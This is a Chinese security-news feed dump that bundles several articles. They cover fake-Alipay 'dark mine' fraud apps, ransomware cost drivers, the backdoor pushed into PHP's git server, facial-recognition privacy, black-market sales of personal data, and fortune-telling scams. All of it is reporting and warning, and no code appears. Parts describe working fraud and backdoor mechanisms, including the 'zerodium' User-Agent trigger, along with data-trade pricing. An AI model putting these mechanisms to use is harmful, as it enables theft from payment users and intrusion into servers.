首先这种骗术还有专门的名字,中二气息十足,那就是"暗雷",一听名字就知道来自暗网,且踩上就炸。这些雷,就埋在各种来路不明的APP上,看奇奇怪怪的直播、超低价拼团、买优惠券中最容易出现。所以说,不要薅羊毛,因为很有可能,你才是羊毛。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


首先来看下这个骗术的原理:根据支付宝开发平台的政策,正常的第三方APP在集成支付宝支付功能时,首先APP会检测你手机里是否安装了支付宝,有的话,就会跳转到支付宝的APP中支付。如果没有安装支付宝,APP就会在APP内打开网页版的支付宝,让用户支付。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


大部分人手机都有支付宝的APP。其实,在支付宝APP内支付,支付宝内嵌了安全功能,还是相对安全的。而暗雷APP并不会按正常的逻辑来执行,它会修改代码,跳过检查是否安装了支付宝这一步,直接调起网页版支付宝,并且这个网页版支付宝的页面还是假的。

然而,在暗雷APP内,由于全屏显示,你无法发现访问的URL并非是支付宝官方链接,你所有输入的账户和密码信息,都输入到了暗雷APP为你准备好的一个山寨网页。

你在点击支付时,你所输入的账户和密码,相当于白给了暗雷。暗雷自动填写到支付宝,实际上要多少钱,就是看暗雷想要多少了。当然不是每个人的账户都有那么多钱,暗雷也不会要太多,以免狮子大开口,支付失败被你发现。果然,最好的防骗手段就是穷。

因此,让你看到只需付款1块钱,并让你填写了真实账户和密码信息的地方,实际从始至终都是暗雷APP伪冒的支付宝页面。

简单点说,暗雷APP像是你和支付宝中间的传话人。如果在支付宝内支付,支付宝会直接问你本人,你要给他多少钱。但如果是在暗雷APP内的伪冒支付宝页面进行支付,实际是暗雷传话给支付宝的,而在传话过程中暗雷可以两边欺骗,拿着你的账号密码跟支付宝要更多的钱。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


一般支付软件的风控系统主要是通过IP异地、新设备等特征,避免你密码泄露之后,被人用其他手机在其他城市非法转账。而暗雷攻击,比传统钓鱼改进的是,操作的就是你本人,在本地,用的是原来的手机。它虽然偷了你的账号密码,但实际转钱的操作还是你自己做的,相当于你偷你自己的钱,支付宝风控无法检测出来。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


另外从代码层面,这个APP不是木马,也没有远程控制或者偷数据的行为,导致杀毒软件无法检测。所以,这个"暗雷",很难挖。

而且暗雷APP为了有效定位目标人群,避免被封停,还采取了:自动定位——可以选择任意地点;多级代理——隐藏真实身份;域名防封——动态置换域名,避免被封;多模板源码——不停更换APP场景和类型;等方式来避免被封技术,做足自我保护。

所以现在唯一的方法是,支付的时候多留神!如果你的手机安装了支付宝APP,但是在某个APP内选择支付宝支付时,跳出的是网页端支付宝,就要注意看是否有问题了。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


更可怕的是,这个雷已经全面开花,到处能踩。从APP定制-渠道分发-赃款代收,形成了一个成熟的产业链。

APP定制,就是只需要5000-8000元,暗雷就可以根据你的意愿一条龙服务,提供可完整运营的付费源码+搭建APP前后端的教程。骗子就可以把这个暗雷技术在渠道上分发给看直播、团购、优惠券、秒杀等一切需要付款的场景,打造各种骗钱APP。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


让我来解释一下什么是渠道分发,简单点讲就是骗子有一万种方法,让你用上他们的山寨APP。

他们可以将这些山寨APP的下载链接发布到各个不同的人群中去,比如 "优惠代金券",就可以发到女性购物类的论坛或者微信群。而"在线直播"则可以发到狼友群。“1分钱抢5个土鸡蛋”则垂直分类到退休大妈大爷的朋友圈。360度立体环绕包围,为每一个潜在受害者打造超长生态链,总有一款能敲开受害者心房。

当然上述骗术起码都算走心型的,起码通过用户喜好去忽悠。

更隐蔽省事的骗子也有,他们直接对售卖的新手机预装"APP分发服务",通过类似植入病毒的手法在用户手机上安装黑产APP。有的用户经常会发现手机里莫名其妙多出一些应用,这就是黑产人员通过手机预装的恶意"APP分发服务",那些你不知道什么时候下载好的应用,很有可能就是雷。

不要小看这种无下限的手段。据腾讯监测结果,手机恶意推广的病毒变种每天新增过万,每天受影响的用户超过数千万个。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


对于熟悉互联网的用户来说,山寨APP可能被一眼识破,但是对于三四线城市或者父母辈而言,他们不熟悉互联网品牌,不知道哪些是大品牌哪些是小破站,很有可能被这种无处不在的分发欺骗。

最后来讲讲赃款代收。为什么受害者被骗之后,没法把钱要回来?因为他们也不容易查到具体实施诈骗的企业或者个人到底是谁。作案人员通常是从黑市上买到的合法企业或者个体工商户信息也就是对公账户八件套进行的注册。这块也有完整的产业链支持,一般都交由通道商代为收账,通道商通常收取5%-15%不等的抽成。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


安全的攻防是长期的拉锯战,我们自己首先能做的就是尽量避免下载各种薅羊毛占便宜、打擦边球类的app,并且从正规应用市场下载安装软件。并且真的分享给身边的人,远离各种来路不明的APP。请切记,不作死就不会死,不贪财就不会散财,天底下没有免费的午餐,如果有,那可能是你自己不小心被人吃了。

9999.jpg

]]>
勒索软件攻击导致损失上升的五种原因 Thu, 22 Apr 2021 23:10:26 +0800 640.webp (5).jpg

勒索软件攻击导致的全部成本中,赎金依然只占据一小部分,但相关成本却在持续增长。
没多少企业和机构像美国环球健康服务(UHS)那么悲剧:2020年9月被勒索软件攻击搞瘫网络,此后相关成本累积到6700万美元之巨。然而,UHS不过是勒索软件攻击导致沉重经济损失不断累加的个案,过去两年来,此类攻击引发受害者持续失血的案例不知凡几。
跟踪勒索软件攻击趋势的安全专家认为,有多个因素在推升勒索软件攻击的相关成本,尤其是对医疗保健行业的企业和机构而言。其中最明显的是攻击者索要赎金平均数额的上涨。
网络保险公司Coalition去年分析了保单持有人的索赔数据,发现平均赎金2020年第一季度刚过23万美元,但2020年第二季度就跃升到近33.9万美元了。有些攻击者,比如Maze系勒索软件背后的黑客,平均向受害者索要42万美元的赎金。Coveware的研究揭示,实际勒索软件支出也直线上升,从2019年第四季度的稍稍超过8.4万美元,飙升至2020年第三季度的近23.4万美元。
但是,赎金本身只是总成本的一部分,而且对拒绝接受勒索的企业和机构而言往往根本无需考虑。不过,即使拒绝支付赎金,攻击所致成本在过去两年间还是不断增加了。安全专家表示,勒索软件攻击相关成本不断上升很大程度上是由于下列五个常见原因。
1. 宕机成本
勒索软件攻击相关成本中,宕机导致的成本即使不算最大,也是比重较大的几项之一了。遭受勒索软件攻击之后,受害者往往需要花费数天乃至数周的时间恢复系统。期间正常服务可能遭到严重干扰,导致业务损失、机会丧失、客户好感度下滑、SLA被打破、品牌声誉跌落等等。例如,UHS的巨额损失就是源自无法像平常一样提供病患护理服务,以及开单延迟。
此类问题甚至还会更加严重。最近几个月,恶意黑客开始对运营技术网络下手,意图延长受害者的宕机时间,增加他们支付赎金的压力。今年早些时候包装巨头WestRock Company遭遇的攻击就是一例,该公司多处制造厂和加工厂的运营受到影响。本田公司在2020年也遭遇了类似的攻击,几间海外工厂暂时中断运营。
Veritas去年委托执行的一项调查面向近2700名IT专业人士,三分之二的受访者估计自家公司至少要花费五天时间才能从勒索软件攻击中恢复。Coveware另一份报告中的平均宕机时间甚至更长,2020年第四季度的平均宕机时间高达21天之久。
Datto首席信息安全官Ryan Weeks称,公司去年的调查显示,2020年勒索软件攻击相关宕机造成的平均成本比此前一年高出了93%,实在令人惊异。他表示:“宕机往往比赎金本身更伤钱。宕机成本的飙升速度让我们不得不慎重对待勒索软件攻击潮。”
该公司的数据显示,源自勒索软件攻击的宕机平均能产生高达27.42万美元的成本,相比平均赎金确实要高得多。这就导致公司企业很容易屈服于攻击者,乖乖支付赎金以求尽快恢复正常。例如,2018年,美国佐治亚州亚特兰大市遭遇勒索软件攻击,该市拒绝支付赎金,系统恢复费用高达1700万美元。然而,赎金本身仅价值5.1万美元。
此类数据表明,企业和机构需要设置考虑周全的网络弹性策略和业务连续性计划。考虑业务连续性计划的时候,企业和机构需关注恢复时间目标(RTO),也就是业务运营最长在多少时间内必须恢复;以及恢复点目标(RPO),也就是需回溯到多久之前的可用数据。计算RTO有助于确定公司在无法访问数据的情况下能撑多长时间而不陷入危机。指定RPO则可以弄清楚公司执行数据备份的频率。
2. 双重勒索相关的成本
勒索软件攻击的趋势令人备感忧虑,攻击者开始在锁定系统前盗取大量敏感数据,然后将这些被盗数据作为额外的筹码再行勒索。只要受害者拒绝支付赎金,攻击者就会通过暗网泄露数据。
日本日经与趋势科技联合进行的调查研究发现,仅2020年1月到10月,全球超过1000家企业和机构沦为了此类双重勒索攻击的受害者。据称,此类攻击始于Maze勒索软件家族背后的黑客,然后Sodinokibi、Nemty、Doppelpaymer、Ryuk和Egregor等勒索软件攻击团伙迅速跟进。上个季度,Coveware响应的勒索软件事件中70%都涉及数据盗窃。
Acronis网络防护研究副总裁Candid Wuest称:“事实上,许多勒索软件攻击团伙目前在加密之前盗取数据。这就增加了数据泄露的风险,意味着即便系统宕机时间不长就恢复如初,公司可能也需要承担品牌形象损害、法务费用、监管罚款和数据泄露清理服务等所有相关成本。”
这一趋势颠覆了对勒索软件攻击所致损失的一贯认知。无论数据备份和恢复流程多么完美,勒索软件受害者如今必须直面敏感数据被公开披露或卖给竞争对手的真实可能性。因此,Digital Shadows高级网络威胁情报分析师Xue Yin Peh认为,勒索软件攻击的受害者将不得不承受监管机构经济处罚的冲击。根据欧盟《通用数据保护条例》(GDPR)、美国《加州消费者隐私法案》(CCPA)和《 健康保险流通与责任法案》(HIPAA)等监管规定,被盗数据的披露和暴露可能构成数据泄露。
Peh指出:“受害者还可能要面对第三方索赔或集体诉讼等形式的法律后果。”如果被攻击者盗取并披露的数据涉及其他企业和机构,比如第三方数据文件或客户数据,那遭遇此类麻烦的概率还会增加。只要消费者数据被曝,公司就可以预期围绕数据泄露通知的各项成本了。网络保险费用也可能因为勒索软件攻击而上涨。 
3. IT升级成本
勒索软件攻击结束后,企业和机构有时候会低估事件响应和防止后续攻击的成本。如果受害者认为最佳选项是支付赎金,那么这种情况还会更加严重。
SentinelOne的SentinelLabs主管Migo Kedem表示:“在支付赎金拿回被感染机器的情形下,受害者并不能保证攻击者不再染指他们的企业。”谁都无法确定攻击者有没有在系统中植入更多恶意软件,也无法保证他们没有将非法访问权售卖或转移给其他网络犯罪团伙。攻击者一旦收到赎金就会清理恶意软件、删除被盗数据、放弃受害网络访问权这种事,谁敢信?
为缓解进一步攻击,公司企业常常必须升级自身基础设施,实现更好的控制措施。Kedem称:“受害者没考虑到的隐藏成本包括保护网络免遭进一步攻击的事件响应和IT升级成本。”
4. 赎金支付成本上升
很多公司支付赎金是觉得赎金比从头开始恢复数据的开销便宜。但安全专家表示,这种认知大错特错。Sophos去年进行的调查显示,超过四分之一(26%)的勒索软件受害者通过支付赎金找回了数据。但有1%既付出了赎金,也没拿回数据。
Sophos发现,相比不向攻击者低头,那些确实支付了赎金的受害者最终付出了双份的代价。包括宕机、设备与网络修复开支、工时费、机会成本和赎金在内,确实支付了赎金的公司企业平均产生约1400万美元的勒索软件攻击平均成本,而不支付赎金的受害企业其平均成本为73.3万美元。
个中原因就在于,受害者仍然需要做许多工作来恢复数据。Sophos表示,与恢复数据和重返正轨相关的成本,基本上相当于公司企业从备份或用攻击者提供的解密密钥恢复数据的费用。所以,支付赎金仅仅是增加成本而已。
5. 声誉损害成本
勒索软件攻击会侵蚀消费者信任与信心,造成公司流失客户和业务。去年,Arcserve针对美国、英国及其他国家的2000名消费者进行了调查,发现28%的受访者表示,一旦经历过哪怕一次服务中断或数据无法访问,他们就会转向别家了。超过九成(94%)的受访者称,会在购买前考虑公司的可信度;59%表示会避开过去一年中遭受过网络攻击的公司。
近期一个自称“分布式拒绝秘密”(Distributed Denial of Secrets)的组织浮出水面,令公司企业更难低调处理数据泄露事件了。该组织以维基解密为样板,宣称收集了勒索软件攻击者泄露在网上的大量数据,并将以信息透明的名义公开这些数据。已有多家公司的数据遭到该组织曝光,据称数据都是从勒索软件攻击团伙用来泄露被盗数据的网站和论坛上获取的。

9999.jpg

]]>
PHP的Git服务器被入侵,源代码被添加后门 Thu, 22 Apr 2021 23:10:26 +0800

在最新的软件供应链攻击中,PHP官方Git仓库被黑客攻击,代码库被篡改。

1617071718_60628e66dba9eb6cce1c4.png!small?1617071719186

3月28日,攻击者使用PHP的作者Rasmus Lerdorf和Jetbrains开发者Nikita Popov的账号,向git.php.net服务器上的 php-src 存储库推送了两次恶意提交。

PHP Git服务器被植入RCE后门

PHP是一种开源的计算机脚本语言,为互联网上超过79%的网站提供动力。因此,事件一经曝光被引起了强烈关注。

负责人Popov在公告中表示,他们目前还不知道事件是怎样发生的,但是此次事件导致的后果是git.php.net服务器的数据泄露而不是简单的单个账号的泄露。

1617071764_60628e94241b366895461.png!small?1617071764199

官方公告

经观察,在两个恶意提交中,攻击者在上游发布了一个假装成排本更正的神秘修改。

攻击者以Rasmus Lerdorf的身份签署的恶意提交(非法)植入远程代码执行后门

然而,仔细检查一下新增的第370行调用zend_eval_string函数的地方,可以发现,这段代码实际上是为运行被劫持的PHP版本的网站植入了一个后门,以获得轻松的远程代码执行(RCE)。

PHP的开发者表示,如果字符串以'zerodium'开头,这一行就会从useragent HTTP头内执行PHP代码。

此外,PHP相关负责人还表示,恶意提交是在提交几小时后,他们进行常规的代码审查时发现的。这些更改很明显是恶意的,所以很快被还原了。

对于Git这样的源代码版本控制系统来说,这样的事件会发生很正常。因为可以把提交的内容为打上本地任何一个人的签名,然后再把伪造的提交内容上传到Git服务器上。这样一来,就会让人觉得这个提交确实是由签名的人提交的。

PHP官方代码库迁移到GitHub

作为此次事件后的预防措施,PHP维护人员决定将PHP官方源码库迁移至GitHub。

他们表示,虽然调查还在继续,但他们为了使自己的Git基础设施没有多余的风险,他们会关闭git.php.net的服务器。

取而代之的是GitHub上的存储库,之前这只是一个镜像,之后将成为正式服务器。

并且,从现在开始,任何修改都要直接推送到GitHub上而不是原先的服务器。

那些想要帮助PHP的人可以申请在GitHub上被添加为PHP组织的一部分。不过,如果要成为该组织的一员,先要在自己的GitHub账户上开启双因素认证。

目前,PHP还在检查除了那两个恶意提交外的威胁,并且检查是否有任何代码再恶意提交被发现之前被分发到下游。

9999.jpg

]]>
无节制的“刷脸” 叩问技术治理边界 Thu, 22 Apr 2021 23:10:26 +0800        近日去某地调研时,当地的“智慧社区”建设引发了笔者的深刻思考。据管理者介绍,当地在大力推广使用人脸识别门禁系统,但是遭到了部分居民的反对。让笔者感慨之处在于两点,一是从居民的角度来看,反对者的关注点,主要是对采集信息时需要上传房产证存在担忧,但对于“刷脸”所带来的个人信息风险却茫然不知。

e8d9-knaqvqn1953533.png

二是从管理者角度而言,竟然在“互联网+政务”服务网络尚未下沉到社区、居民办事还需要来回跑腿的情况下,却将“人脸识别”当作智慧社区的头号工程。对技术优先级误读的背后,其实是对技术治理目标的认知缺乏——技术的应用是为了提升“治理”水平,是为了惠民,而不是仅仅是为了“管理”上的方便。

实际上,“刷脸进小区”争议已在北京、广东、浙江、江苏等地一再发生,个别地方甚至强制“刷脸进小区”,并将实体门禁卡作废,部分不愿提交个人信息的业主连进出小区都成问题。

随着人脸识别技术对人们生产生活的全方位渗透,我们亟需对“技术热”进行“冷思考”:真的有必要使用这么多“刷脸”技术吗?技术所带来的“人造风险”,是否已经超越了“自然风险”,本身成为了“风险社会”的主要内容?如何解决作为数据贡献者的公众得到的收益远远小于与数据掌控者,但却承担了绝大部分风险的矛盾?

技术已成为“社会风险”的一部分?

从社会学角度来看,人脸识别是数据时代的身份认证标识,延续人脸作为通用标识符的社会功能,通过人脸特征向量化、数据化的方式开启一个通向赛博空间的账户,并与个人权利行使相挂钩,其本质代表了一种身份法律制度。

相比传统的身份认证系统,人脸识别具有种种优势,包括精准刻画、无需接触、不易被盗、高效迅速,不用携带小区门禁卡或者身份证,即可“一脸通行”各类场所,在公共治理、商务交易、安全防控、金融财务等方面得到了广泛应用。

然而,随时随地的便利,也意味着无处不在的控制。隐藏在任何一个角落的高清摄像头都可以毫不费力地抓拍到他人清晰的脸部照片,然后即时上传到人脸信息数据库中进行比对,从而快速识别出相关主体的身份。在此基础上,如果再与其他数据库打通,便可以进一步追踪到个体的活动轨迹、人际关系、财产状况等隐私信息。这一系列迅速而复杂的动作,完全可以在你毫不知情的情况下发生。

可以说,人脸识别相当于一个接口,可以将各个点面的数据打通,与其他智能技术结合运用,将赋予数据控制者“千里眼”“顺风耳”的能力,使其可以穿透信息迷雾,实现对个体全方位、全天候的精准洞察与追踪。

此前据央视3·15晚会曝光,科勒、宝马等20多家知名企业在门店内安装人脸识别摄像头,在未经消费者同意的情况下,自动抓取顾客人脸信息,标注到店、男女、年龄等信息,精确掌握包括性别、年龄、职业、心情状态等特征数据,以及以前到店过几次、消费过多少、行踪轨迹是什么等行为数据。进而通过营销分析,不仅能精准刻画顾客的偏好,甚至能够预测出消费行为,从而进行精准营销。

在此情况下,活生生的人却变成了一行行数据和代码,不仅个人隐私无所遁形,一切行为信息都被精确“记录在案”;同时个人也沦为被识别、被刻画的客体,个人价值交由机器评级、每一分消费者剩余被精准榨干。

可以这么说,人脸被精准识别后,得到的是数据,人的主体性却得到贬损。

除了利益消减之外,社会公众更将面临风险的加剧,这已不仅仅是个人隐私与公共安全的平衡问题了。因为社会公众作为“公共”的组成部分,其人身财产安全将会因为技术滥用而面临巨大的威胁,个人隐私权与公共安全将遭到双重侵害。

正如清华大学法学院教授劳东燕所言,“互联网的基本逻辑是,安全问题的解决并不取决于安保水平与能力最高的部门或企业,而是取决于其中水平最低与能力最差的。允许各式各样的组织与单位随意收集民众的人脸数据,就等于埋下一个个地雷,数据被泄露与滥用的可能性会急剧地提升,这势必严重危及公众的人身与财产安全。”

小区、商业机构在收集了大量人脸信息之后,是否具备起足够的技术能力来防止数据库不被黑客攻破从而被窃取?又如何保证这些机构(或者机构人员)不会为了获利,将其收集来的人脸信息私下里卖给他人?

假如小区所采集的居民信息被加以分析,那么就可以知道某个居民、某个时间段是否在家。一旦相关信息被不法分子获得,那么居民的财产、人身安全都将面临巨大威胁。公共安全不仅不会得到有效改善,相反风险可能会大大增加。

特别值得注意的是,与姓名、电话号码、银行卡密码等普通的个人信息不同,每个人的人脸都是独一无二且不可更改的,一次泄露或将贻害终生。毕竟手机号码若是泄露了,实在不行还可以换一个号码,但人脸信息发生泄露,难道要去“换脸”吗?

任何一项新技术、新举措的使用,都要对其所带来的风险与收益进行衡量。技术发展到今天,我们不仅要问,技术的使用是否已经过度?技术所带来的“人造风险”,是否已经超越了“自然风险”,成为了“社会风险”的主要内容?

更进一步是对社会公平、社会伦理的拷问,数据掌控者攫取了大部分的收益,但作为数据贡献者、同时承担绝大多数风险的公众得到的便利与人们的付出是否匹配。

再有,目前的个人信息收集以“知情同意”为基础,如果作为数据主体的个人表示同意,那么接下来你的数据收集、使用、处理就交给了各个机构,这几乎等于完全脱离了个人的控制,但同时却要由个人来承担风险。理论上说,个人完全可以表示不同意自己的信息被收集,但在现实中却很难做到——要使用各种App就不得不给予同意,或者在不知风险的情况下表示同意,更有如人脸识别这样个人完全不知道自己的信息被采集的情况。这样一来,以知情同意为基础的法律保护框架就显得疲软乏力。

在这种机制之下,数据掌控者对于社会的掌控日趋完美,数据监控全面高效、商业挖掘深度进行,然而他们在从中获益的同时,却将风险转嫁给公众。而当个体的权利遭到侵害之后,却很难找到为此承担法律或道德责任的主体,即使找到的主体,也很难维权。

技术运用的边界究竟在哪?

当然,人脸识别只是一个切口,其背后反映的是整个社会数字治理、技术治理的问题。近年来,无论是智慧城市、数字政府,还是智慧社区、智慧网格,各个治理主体纷纷将智能技术作为驱动治理能力现代化的重要抓手。市场上不计其数的各类商业机构,也争先恐后的利用技术手段,挖掘商业机会和利润。

但在看到技术产生巨大效益的同时,也必须对其潜在风险进行及时预判,当前亟待思考的一个问题是,技术的使用是否已经超限?

一方面,技术的风险溢出是否在可控范围之内?虽然监管落后于创新是客观规律,但如今新技术的发展就像是火箭,但对于其规制手段却像是马车。由于法规与管理的约束不足,相关开发和应用都往往在信息保护、身份认证等技术上明显缺少主动性与责任感。此外,公众的数字素养也未能同步提高,缺乏对新技术风险的评估能力以及自我保护能力,这都会进一步导致技术的风险弥散。

另一方面,技术的使用本身就应该存在一定限度。技术遵循的是“事本”逻辑,其背后是理性主义范式的支撑,并不能百分之百适用具有灵活性、非规则、模糊性的复杂社会。正因此,必须明确“人本”才是主体,“事本”是为了“人本”而服务的。

过度依赖技术,非但不会促进治理效率提升,反而会对治理价值和制度基础构成反噬,社会的管理者将逐渐迷失在数据和算法的海洋中,凡事均习惯性地向技术“寻求帮助”,这不仅会导致人文关怀的缺失,也会使得治理和商业行为陷入冷冰冰的“技术窠臼”,还会大大影响人格的自主性,踏入过度依赖技术的“怪圈”。同时,这也可能导致过度仰赖技术创新,反而忽视了制度创新。

具体到人脸识别技术而言,一是要加快明确人脸识别的适用范围,抛开安防、大型活动等场景,普通园区、企业、楼盘、校园等场所,是否真的必须应用人脸识别?即使真的要用,也应当确定非“强制性使用”,必须提出“替代性方案”,比如允许不同意使用人脸识别的人们通过替代性方式(比如使用门禁卡、身份证)通行。二是要建立健全配套制度,对人脸识别数据采集、存储、使用,以及软硬件认证等做出明确规定,并在立法、执法、监管、公众教育等层面建立多维度的立体防护体系。

放大至数字治理、技术治理的整体视野,亟需扬弃技术决定论,在广泛运用智能技术嵌入社会的同时,加快构建技术运用所需的底层环境,坚持工具理性与价值理性的统一:

一是要树立牢固的思想根基——技术运用应着眼于人民福利的切实提升,而非为了“技术”而运用“技术”;二是要加快建立完善的制度基础——治理技术的创新与制度体系的创新必须双轮驱动;三是要明确技术运用的底线——围绕技术嵌入社会治理的场域、深度、广度做出相关规定,并建立起响应的保障机制。

总而言之,无论“数字”政府,还是“智慧”城市、“智慧”社区,亦或是“智慧”企业,都需要明确的是,前两字都只是手段,后两字才是真正的目的。人类社会需要回归人的自身发展,“技术治理”需要回归“治理”本身、“为人民服务”本身。

9999.jpg



]]>
Canalys警告:未能在网络安全上投入更多资金的企业将面临“大量倒闭” Thu, 22 Apr 2021 23:10:26 +0800        分析公司Canalys警告说,未能在网络安全上投入更多资金的企业将面临 "大量倒闭"。因为研究人员发现过去的12个月里,被入侵的数据比过去15年的总和还要多。勒索软件攻击数量激增,在全球性卫生事件的背景下,医院又成为特殊的目标。由于社交距离和线上工作逐步成为常态,许多企业以牺牲网络安全为代价实施业务连续性措施,进一步加剧了网络安全问题。

       Canalys首席分析师Matthew Ball在评论这份全新的有关网络安全的报告时表示:

"网络安全必须成为数字计划的前沿和中心,否则将出现大规模的企业组织灭绝,这将威胁到COVID-19大流行后的经济复苏。对网络安全关注的失误已经产生了重大影响,导致当前数据泄露危机的升级和勒索软件攻击的加速。"

虽然Canalys表示,在网络安全支出方面还需要做更多的工作,但它也表示,去年网络安全投资已经明显高于IT行业的其他领域。网络安全支出增长到530亿美元,大增10%,但并非增长最快领域,表现优于网络安全的领域是业务连续性和劳动力生产力,其中云基础设施服务增长33%,云软件增长20%。

从单个公司来看,Zoom的远程沟通方案令其营收猛增300%,微软Office 365办公环境带来的业绩保持了两位数的增长,硬件方面,笔记本电脑的出货量也创下了历史新高,罗技的网络摄像头销量也在蓬勃发展,甚至连Wi-Fi路由器的销量也随着人们转向在家办公而增长了40%。

虽然这些事情都很重要,但Canalys最终还是希望企业增加在网络安全方面的支出,因为不这样做最终可能会因为恢复成本过高而导致企业破产。



]]>
内鬼黑客狂卖个人信息 泄露数达55.3亿条,催生“年产值”上千亿数据黑市 Thu, 22 Apr 2021 23:10:26 +0800 近期,证券时报记者深入多个数据交易千人QQ群发现,各行各业的用户隐私数据被肆意贩卖,触目惊心。不时有人在群里喊单,“出一手GM(股民)、WD(网贷)、BJ(保健)信息,拼多多、淘宝、京东一手网购数据,需要数据的联系我……”这些数据按照行业划分被明码标价。甚至还有采集个人信息的系统展示,号称可以采集全国老板的私人联系方式。还有五花八门爬取数据的软件,“爬”上网站,“嵌”入APP,“铲”下数据。


%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E9%94%81%E8%B1%A1%E4%BF%A1%E6%81%AF%E4%BF%9D%E5%AF%86%E6%80%A7%E6%95%B0%E6%8D%AE%E4%BF%9D%E6%8A%A4%E4%BA%92%E8%81%94%E7%BD%91%E5%92%8C%E6%8A%80%E6%9C%AF%E6%A6%82%E5%BF%B5-127452164.jpg

整个数据交易过程中,内鬼、黑客、爬虫软件开发商、清洗者、加工者、料商、买家等寄生于此,催生出一个“年产值”上千亿的数据黑市。

报道指出,SDK(软件开发工具包)提供商泄露和滥用用户信息非常隐蔽,甚至成为了泄露用户隐私的源头之一。

在调查采访过程中,黑市数据交易市场非常活跃且采集数据软件五花八门,其中一款名为汇容客的APP,号称“全网最全大数据获客软件”。其销售经理向记者称,“我们这款软件是全自动采集,只要搜索关键词,就能在各大网站、三大地图、三大运营商搜索出你想要的客户资源和群体,不仅是获客功能,我们还能提供营销素材,带货视频等,每档功能都会对应不同价格。”

当记者问及跟哪三大地图合作时,该销售经理称主要是腾讯地图、高德地图以及百度地图,并且是经过授权使用他们的数据接口,并向记者发来跟三大地图运营商盖章的合同协议。

就此记者向百度、腾讯以及高德公司求证是否授权汇容客使用平台用户数据,对方均一致表示不清楚这家公司,也不会将API(数据接口)随意授权。腾讯内部相关人士向记者称,这个章是假的,字体不一样。

报道还称,除内鬼和通过技术手段之外,黑客是盗取大量个人信息的另一重要源头。

一行业料商向记者表示,仅包含个人普通信息比如电话号码、微信、QQ号等,平均拿货成本价每条信息在4毛左右,卖出去的单条价格在7~8毛左右,每条个人信息约赚3~4毛左右。“我每个月销售数据流水大概在40万~50万元,金融、教育、医美等行业都做,这块需求量会比较大。”

记者在与多位料商接触采访过程中了解到,上述料商并非一级料商,一级料商的进货成本在0.15元/条左右,类似祝经理的二级料商进货成本为0.4元/条左右,三级料商进货成本0.7~0.8元/条,对终端售卖均价在1.2~1.5元/条。

上述不过是数据黑市交易中普通隐私数据价格。在数据黑市中,还有料商专门从事“渗透数据”交易,所谓的“渗透数据”就是所有信息都能够被抓取,除了电话号码、微信等基本信息以外,还包含用户的身份证号、出行记录、开房记录、通话记录、家庭成员、工作、婚姻状态、户籍所在地等。

有料商甚至在QQ群里直接将“渗透数据”明码标价,查询个人简易信息15元/条,包含姓名、性别、手机号;中级信息50元/条,除了简易信息外,还包含户籍地址、身份证号、照片;高级信息100元/条,在中级信息基础上还包含现住地址、开房记录、车辆信息;VIP客户600元/条。

“正常行情价仅通话记录,叫价在1500元左右,开房记录价格在2200~2500元左右,家庭成员信息在300元左右。”网名“风”的料商称。

据不完全统计,国内个人信息泄露数达55.3亿条左右。平均算下来,每个人就有4条相关的个人信息泄露,车辆、房产、地址、职业、年龄、电话号码、身份证信息等在黑市上频繁流动。国内知名信息安全团队“雨袭团”去年10月发布报告称,在一年半的时间内,高达8.6亿条个人信息数据被明码标价售卖,个人数据基本处于裸奔状态。

9999.jpg

]]>
警惕有人变着花样“消费”年轻人的焦虑 Thu, 22 Apr 2021 23:10:26 +0800  转发锦鲤、玩塔罗牌、看星座属相、分析面相八字……这些所谓的互联网玄学在年轻网民中蔚为风行。

央视网评丨警惕有人变着花样“消费”年轻人的焦虑


  对部分年轻人来说,他们对这些所谓的互联网玄学的态度与其说是“信”,不如说是“玩”。有些人参与“转发好运”游戏,用塔罗牌“认知内心”,或拆字看相测姻缘、凭星座看运势,只是对神秘学说感兴趣,抑或是搞圈层内的趣缘社交。

  当然,除了出于好玩的心理,不少人玩玄学,还有将其当安慰剂的成分,在高强度竞争和快节奏生活中找不到太多“延缓行动策略”,那就盘盘玄学,用转发锦鲤给自己积极暗示,顺带着打打气。

  需要警惕的是,不少人却从中发现了“商机”。如今,在线占卜、AI算命、线上作法、网售灵符、卖转运手链、直播牌解分析、看相卜卦付费课等生意,共同做大了“玄学经济”的盘子。你看到的,是运势占卜的无孔不入;你看不到的,是有些玩家以此布局落子,以免费服务吸引公域或私域流量,进而诱导目标群体买单。

  他们有的是通过自媒体或APP、小程序等推出线上算命与转运服务,有的是搭建“大师”和用户见面的所谓咨询类平台,还有的开班教学,授课拉人头、搞代理,以“低价基础网授课+高价进阶面授课”的形式收割“信众”。这其实是变着花样“消费”很多人的焦虑,还借此收“迷信税”。

央视网评丨警惕有人变着花样“消费”年轻人的焦虑


  更有甚者,有些骗子借玄学行骗,打着祈福转运的幌子,行骗钱之实,什么买镇妖塔安家保婚姻、买驱邪符祛除霉运等不一而足。此前媒体曝出的“女子长时间生病,多次高价购买‘驱邪符’被骗走250多万元”的案例就是现实的教训。

  由此可见,互联网玄学不只是个文化问题,还是个社会问题——那些将年轻人推到玄学中的普遍性焦虑,需要更好地纾解。与其嘲笑他们这样缓解压力是隔靴搔痒,不如真切地想方设法为他们减压。

  当然,年轻人自己也要保持该有的理性,别入戏太深,莫给那些披着“玄学家”外衣的骗子以可乘之机。

9999.jpg

]]>
安全周报(03.22-03.29) Thu, 22 Apr 2021 23:10:26 +0800

1、宏碁回应遭网络攻击:已采取措施且不打算支付赎金


3月20日,电脑巨头宏碁(acer)遭遇REvil勒索软件攻击,攻击者向其索要5000万美元的赎金。

640.png


据共同社报道,知名电脑厂商台湾宏碁公司(acer)遭遇网络攻击,内部信息可能已经外泄。网络犯罪团伙把疑似通过非法入侵获取的部分数据公布在网上,索要金钱作为数据不外泄的回报。已暴露的数据中,有多家可能是交易对象的日本企业的名称。

